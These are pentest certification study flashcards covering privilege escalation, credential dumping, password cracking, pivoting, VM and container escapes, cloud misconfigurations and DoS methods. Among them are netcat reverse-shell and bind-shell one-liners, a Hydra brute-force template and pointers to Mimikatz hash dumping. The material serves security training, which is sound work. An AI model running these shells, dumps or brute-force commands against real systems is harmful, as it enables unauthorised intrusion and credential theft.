Chapter 10: Attacking Hosts, Cloud Technologies, and Specialized Systems Flashcards
SUID/SGID
Set User ID / Set Group ID
Tells Linux OS that the executable files they’re set for should be run as the owner of the file, not the user who launched it
find / -perm -4000 (root find command that shows all SUID files and folders)
Linux executables that can be used for privilege escalation if SUID permissions are set:
* cp
* find
* Bash shell
* more
* less
* VIM
* Nano
* nmap
Unsecure SUDO
All users who can use sudo on Linux are listed in the sudoers file
Always check the file after gaining acces to identify new targets and what rights they have
Shell Upgrade Attacks
Restricted shells limit commands or apps that can be used as well as restrict users from:
* Changing directory
* Set PATH or SHELL variables
* Specifcy absolute paths
* Redirect output
* ETC
Breaking out of restricted shells can be done by starting a new unrestricted shell or using VIM that has a built in shell function
In general, when faced with a restricted shell, do the following:
* Check the commands you can run, particularly looking for SUID commands
* Check if you can use sudo and what sudo commands you can execute
* Check for Perl, Python, Ruby, etc that you can run
* Check if you can use redirect operators like pipes and carrots and escape characters like single / double quote, etc
Linux Kernel Exploits
Often requires local access to the system
Most kernel patches require a system reboot, and admins may delay kernel updates as a result
Presents an oppty for attackers to gain access since they might not be patched due to a lower perceived risk
To check if you can use Linux for potential kernel exploits:
* lsb_release -a (checks OS release)
* uname -a (checks kernel version)
Acquiring and Using Hashes
Windows uses NTLM password hashes for authentcation purposes, and tools like Mimikatz can easily obtain them
NTLM hashes are unsalted
Pass the hash attack is harvesting the NTLM hash and then injecting it into LSASS, SMB, or WMI it as the password since Windows doesn’t verify the actual contents of the password, just the hash
Sysinternals tool psexec can directly accept NTLM hashes as an argument instead of a password
LSA Secrets
Registry location:
* HKEY_LOCAL _MACHINE/Security/Policy/Secrets
Contains the encrypted password of logged in user, but the key is stored in the parent Policy key in the Registry
If you gain admin access to the Registry you can get both
SAM Database
Windows Security Accounts Manager
One of the first places that you want to target when you gain access to a Windows system
Contains password hashes that can be dumped with Mimikatz or Metasploit using Mimikatz functionality
Windows Kernel Exploits
Metsaploit module to list any missing patches:
* post/windows/gather/enum_patches
Reference that list against vulnerability databases to determine if an exploit exists for the unpatched issue
Metasploit has other exploit modules for many of the Windows kernel exploits discovered over, allowing you to assess flaws and attempt exploits once you access the system
Unsecure File and Folder Permissions
Linux:
* ls and grep the output for specific persmissions
Windows:
* AccessEnum (sysinternals)
* Accesschck (sysinternals)
* Get-Acl (ps1)
* icacls
Credential Acquisition
Windows:
* Mimikatz (standalone)
* Mimikatz (Metasploit meterpreter function)
Linux:
* creddump package on Kali
* cachedump (dumps cached creds)
* lsadump (dumps LSA secrets)
* pwdump (dumps password hashes)
Offline Password Cracking
Hashcat
* Uses GPU to crack passwords at high rate of speed
* Much faster than tools like John, which are CPU bound
RainbowCrack
* Rainbow tables for Linux and Windows
* Pre-computed tables that allow you to search for a password hash versus the password itself
John the Ripper
* Autodetects common hashes while providing support for Linux and Windows password hashes
* Custom dictionaries and other word lists
Cain and Abel
* Outdated password recovery tool for Windows NT, 2000, and XP
Credential Testing and Brute Force Tools
Hydra
* thc-hydra
* Brute force dictionary attack tool that works against many protocols and services
* SSH, http(s), SMB, databases
* hydra -l [userid] -p [wordlist] [target ip] -t [timing] [protocol]
Medusa
* Similar to Hydra, and if Hydra works for you likely won’t need Medusa
Patator
* Less script kiddie friendly and difficult to use
* Variety of features that might be useful though
Directories and Filename Brute Force
W3AF
* Web App Attack and Audit Framework
* Open source web app security scanner that includes directory and filename brute forcing
DirBuster
* Dated but still useful Java app that brute forces directories and filenames on web servers
* Hasn’t been updated since 2013
Wordlists and Dictionaries
CeWL
* Custom Word List Generator
* Ruby app that allows you to spider a website based on a URL and depth setting, then generate a wordlist from the files and web pages it finds
* Running against target org can help genreate a customer wordlist
* Add words manually based on OSINT
Proxychains
Use to tunnel any traffic through a proxy server with full support for HTTP, SOCKS4, and SOCKS5 proxy servers
Can chain multiple proxies together to further conceal actions
proxychains [application command]
By default it uses TOR, but you can configure it to use others vai /etc/proxychains.conf
Remote Access
SSH
* Aside from the Linux SSH service, useful for port forwarding while pivoting
* Can forward traffic through SSH tunnels and hide attack traffic from defenders
* Check what exists in a users ./ssh directory for potential keys
* EX (port forward): ssh -R[port A]:[host1]:[port B] [user]:[host2]
NETCAT and Ncat
* Reverse shell
* nc [IP of remote system] [port] -e /bin/sh
* Windows reverse shell
* nc [IP of remote system] [port] -e cmd.exe
* Listener
* nc -l -p [port] -e /bin/sh
Virtual Machine Attacks
Check for VM
* (Windows) wmic baseboard get manufacturer, product
* (Linux) system-detect-virt — demidecode —ls -l /dev/disk/by-id
Once you know what hypervisor you’re dealing with you can conduct research on the attack methods that may be best for the environment
DION NOTES
VM Escape
Occurs when an attacker attempts to get out of an isolated VM and directly sends commands to the underlying hypervisor
* Because each VM is supposed to be isolated, VM escape is difficult to accomplish
* To be effective, attacker has to interface with the underlying physical resources (memory, HD, processing)
* Exploit is usually within the hypervisor’s code itself
* Easier to perform on Type 2 hypervisor than Type 1
* VM to hypervisor or host OS
VM Hopping
Occurs when an attacker attempts to move from one VM to another on the same host
* Focuses on exploiting the hypervisor on the virtualization software or some kind of feature to move between the two isolated VMs
* Unlike escape, hopping is VM to VM
Sandbox Escape
Occurs when an attacker circumvents sandbox protections to gain access to the protected OS or other privileged processes
Other VM Concerns
Live Migration
* Migrating a VM from one host to another, even while it’s running
* If the live migration happens over an unencrypted connection, there’s a possibility that the data contained in the VM is exposed or the integrity compromised by on-path attack
* Encrypt VM images before sending
Data Remnants
* Leftover pieces of data that may exist in the HD which are no longer needed
* Always encrypt VM storage locations and ensure the encryption key is destroyed when the VM is no longer needed
VM Sprawl
* Creating VMs without proper change control procedures
* Attackers can gain access to one that’s been spun up and forgotten, and then use it to pivot
VM Repositories
* A place where all VM images and templates are being stored
* If you can embed malware or a backdoor in one of the templates, any time a new VM is generated it’s infected
Container Attacks
Containerized Workload Vulnerabilities
* Focus on the apps running in containers themselves
* Pentesters can leverage existing app or service vulnerabilities to exploit APIs
* Use exploited APIs to go further attack like installing tools into the containerized environment
Misconfigured Containerized Technologies
* Look for exposed API services, dashboards, open proxies, and configuration information
* Improperly secured management tools, improperly set permissions, or access to secrets is desirable as well
DION NOTES
If an attacker compromises the host OS underneath the containers, they now have access to all of the containers and their data
* Hosting all VMs on the same type of hypervisor can also be exploited
Vulnerabilities of Container Hosting
1. When an org crashes a physical server, all of the org’s hosted on that same server are impacted
2. An org failing to secure its virtual environments hosted on a shared server poses a security risk for the other orgs hosting on the same server
Attacking and Using Misconfigured Cloud Assets
IAM
* Commonly misconfigured due to improper or weak settings
* Can be as simple as not enforcing best practices for credentials and passwords
* Often more specific to the service or system they’re set up to protect
* EX: Putting the wrong security group or policy on a cloud asset
Object Storage
* Amazon S3 for example
* When you assess an object store you’re looking for publicly accessible storage, open upload access, directory listing rights, or open download access
* AWS CLI to check what a S3 bucket alows
* aws s3 ls s3://examplebucket -recursive -human-readable
Federation Misconfigurations
* Commonly used between on-site AD environments and Azure’s AD for MS tools like Exchange
* Local ADFS server connects to Azure allowing authentication and authorization between environments
* Attacks that focus on signing certs and tokens can be conducted, and misconfigs can be used in both local and cloud (similar to Kerberos attacks)
DION NOTES
Misconfigured Cloud Assets
Account, storage, container, or other cloud-based resource that’s vulnerable to attack because of its current configuration
Cloud Federation
The combination of infrastructure, platform services, and software to create data and applications that are hosted by the cloud
IAM
Defines how users and devices are represented in the org and their associated permissions to resources within the org’s cloud federation, including types like:
* Personnel: Defines identities for an org’s employees
* Endpoints: For resources and devices used by personnal to gain legitimate access to the network
* Server: Mission critical systems that provide a service to other users and endpoints
* Software: Uniquely identifies a software’s provenance prior to installation
* Roles: Supports the identities of various assets and associated permissions and rights to the roles or functions of those resources
These are not always tied to a user—sometimes related to software and hardware, and those things need to be given certain rights and permissions
* Attackers will look for misconfigurations on all levels of the IAM system so they can gain more permissions and escalate or laterally move
Object Storage
Cloud data is stored in buckets (AWS) or blobs (Azure)
* Each container is created in a specific region or availability zone within that cloud service provider
* All objects are then placed into the buckets or blobs
* Container is like a folder, object is like a file
* Permissions are set with object ACLs, container policies, and access management authorizations
Exploit Possibilities
* By default, storage containers set themselves to read-write which can make any data uploaded freely accessible, which can lead to unauthorized access or the hosting of malicious files
* Containers are often used to host static files like video, image, audio, and webpages—if they misconfigure their CORS policy with the CDN, an attacker can exploit with XSS
* CORS allows objects to be read from multiple domain names and displayed properly in a browser—by default the accepted domains are the asterisk wildcard (misconfig is in OWASP 10 broken access control)
Cloud Malware Injection Attacks
On-path attacks that redirect users to attackers instances of cloud services
Traditionally was accomplished using XSS, but injecting malicious code into service or code pipelines or adding malicious tools into existing cloud infrastructure can also work
DION NOTES
Attempts to add an infected service implementation module to the cloud service, and can be done with SQL injection, XML injection, XSS attack, etc
* The attacker is attempting to insert malicious code into a service or server, and then have it execute that malicious code when the end user makes a request to that cloud service
Resource Exhaustion and DoS
Even though cloud tech can scale under load, they can still be exhausted and overloaded
Pentesters are less likely to be able to achieve this though
DION NOTES
A DoS is used to attack any protocol, device, OS, or service in an attempt to disrupt the services it provides to its users
* Usually caused by resource exhaustion
* Attacker exploits a system in order to consume all the CPU, memory, disk space, or allowed client connections
* If all resources are exhaused, the system could have a failure or fully crash
Resource Exhaustion Techniques
Amplification or Volumetric Attacks
Used to saturate the bandwidth of a given network resource
* EX: If an org is using a 10mbps elastic file system connection, an attacker can overwhelm this connection by continually requesting large files from that elastic file system resource—as the connection is saturated, it slows down or even stops
Fragmentation of Requests
Sending multiple fragmented TCP requests to a server
* Since the requests are fragmented, the server has to manage these fragmented pieces until it can match up the requests fully
* Similar to a puzzle, the server can’t see the big picture yet and answer the request until all pieces are reassembled
* As it holds the pieces, it must allocate resources to that
* If the resources aren’t freed up, could create DoS via resource exhaustion
Other DoS Attacks on Cloud
* Packet flood
* SYN flood
* HTTP flood
* DNS flood
* DNS amplification
* NTP amplification
Direct to Origin (D2O) Attacks
Form of DDoS that works to bypass CDNs or other load distribution and proxying tools
Aims to attack underlying infrastructure and intended to negate protections and capacity provided by CDNs
Less likely for pentesters to conduct due to complexity and expense associated with it
DION NOTES
Attempts to bypass reverse proxies to directly attack the original network or IP address of the cloud-based server
* If an attacker can identify the IP address of the origin server or network, they can attack that origin directly
How It Works
* The attacker starts by launching their attack through the normal reverse proxy
* The reverse proxy should block the attack
* But during the attempt, the attacker can attempt to disclose the origin IP or network address of the origin server
* If they can get that information, the attack can then be launched directly against that origin and completely bypass the reverse proxy or other DDoS protection
Side Channel Attacks
Where attackers try to use shared resources or compromise of the virtualization or containerization system to gain access to data without compromising the target system itself
DION NOTES
Aims to measure or exploit the indirect effects of a system instead of targeting the code or program directly
* For cloud targets, the most common side channel attack attempts to exploit the shared nature of the cloud infrastructure
* The goal would be to gain access to sensitive information that’s leaking out of the infrastructure like cryptographic keys that are used by the cloud-based servers
* These attacks often attempted to compromise IaaS architecture by placing a VM on the same physical server as their targeted VM
* Then, the attacker attempts to extract useful information from the VM using a covert channel by identifying sensitive details from that targeted VM
To Prevent
* Encrypt all cloud data
* Use strong MFA checks
* Verify all cloud service configs through routine monitoring and auditing
Page 383 picture
Tools for Cloud Technology Attacks
ScoutSuite
Open source multicloud auditing tool written in Python that can be used to audit instances and policies created on multicloud platforms by collecting data using API calls
* You can run SS without having to notify cloud providers about pentesting or scanning activities
* Allows you to write custom rules sets as well that you can use during scans to highlight or flag things when a policy violation exists, like no MFA being used
After it run, it compiles a report that lists out:
* VM instances
* Storage containers
* IAM accounts
* Data and firewall ACLS
Prowler
Open-source secrity tool used for security best practices assessments, audits, IR, continuous monitoring, hardening, and forensics readiness for AWS cloud services
* Able to check for compliance against over 200 different controls
* CLI tool that can create a report in HTML, CSV, and JSON
* Can use checks and rules, or create your own
* Useful for checking multiple AWS accounts in parallel
CloudBrute
Used to find a target’s infrastructure, files, and apps across the top CSP including Amazin, MS, Google, DigitalOcean, Alibab, Vultr, and Linode
* Works like a web crawler or brute force directory tool like DirBuster
* Runs without credentials and will try common brute force techniques to help enumerate
* Focuses on object storage, VMs, containers, etc
Pacu
Exploitation framework used to assess the security configuration of an AWS account
* Performs testing for privilege escalation, disrupts monitoring efforts, implants backdoors via IAM user account modification and security groups
* Focuses on the post-compromise phase
* Thnk of it like Metasploit but specifically for AWS cloud infrastructure
Cloud Custodian
Cloud security, governance, and management tool designed to help admins create policies based on different resource types
* Not intended as a pentest tool
* Helps users secure their cloud environment
* But reports it provides can help pentesters identify new oppty
